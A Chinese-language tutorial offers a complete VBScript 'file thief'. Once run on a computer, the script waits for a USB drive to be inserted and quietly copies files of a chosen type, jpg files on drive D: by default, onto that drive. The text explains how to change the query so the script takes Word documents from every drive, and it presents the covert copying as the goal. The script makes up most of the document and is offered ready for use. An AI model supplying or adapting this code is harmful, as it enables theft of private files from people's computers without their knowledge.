所谓“文件‘小偷’”,是指当U盘插入某台电脑时,会自动在该台电脑指定的目录或所有盘符下搜索指定扩展名的文件,并隐蔽地拷贝到U盘中来,达到“偷文件”的目的。 程序很简单,只需将以下程序拷贝到记事本中,并另存为XXX.vbs的文件,双击即可运行,此时插入U盘,一会D盘中的jpg文件就在不声不响中被拷贝到U盘中来喽。需要注意的是:以下程序示例的是搜索并拷贝D盘下扩展名为jpg的文件,使用时可根据需要自行修改。比如,要搜索并拷贝电脑中的WORD文档,则将 ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'")修改为 ExecQuery("Select * from CIM_DataFile where Extension = 'doc' or Extension = 'docx' "),是不是很简单呢!
Const Configuration_Changed = 1
Const Device_Arrival = 2
Const Device_Removal = 3
Const Docking = 4
Set fso = CreateObject("Scripting.FileSystemObject")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colFiles = objWMIService. _
ExecQuery("Select * from CIM_DataFile where drive='d:' and Extension = 'jpg'")
Set colMonitoredEvents = objWMIService. _
ExecNotificationQuery( _
"Select * from Win32_VolumeChangeEvent")
Do
Set objLatestEvent = colMonitoredEvents.NextEvent
Select Case objLatestEvent.EventType
Case Device_Arrival
'WScript.Echo "U盘插入,盘符为" & objLatestEvent.DriveName
For Each objFile in colFiles
'fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
msgstr=msgstr & Chr(13) & Chr(10) & objFile.Name
'msgbox InStr(objFile.Name,"$") & Chr(13) & Chr(10) & objFile.Name
'以下防止拷贝到临时文件
if InStr(objFile.Name,"$")=0 then
fso.CopyFile objFile.Name,objLatestEvent.DriveName & "\",False
end if
Next
' msgbox msgstr '显示搜索到的文件列表
'msgbox objLatestEvent.DriveName '显示U盘盘符
Case Device_Removal
WScript.Echo "U盘弹出,盘符为" & objLatestEvent.DriveName
End Select
Loop
|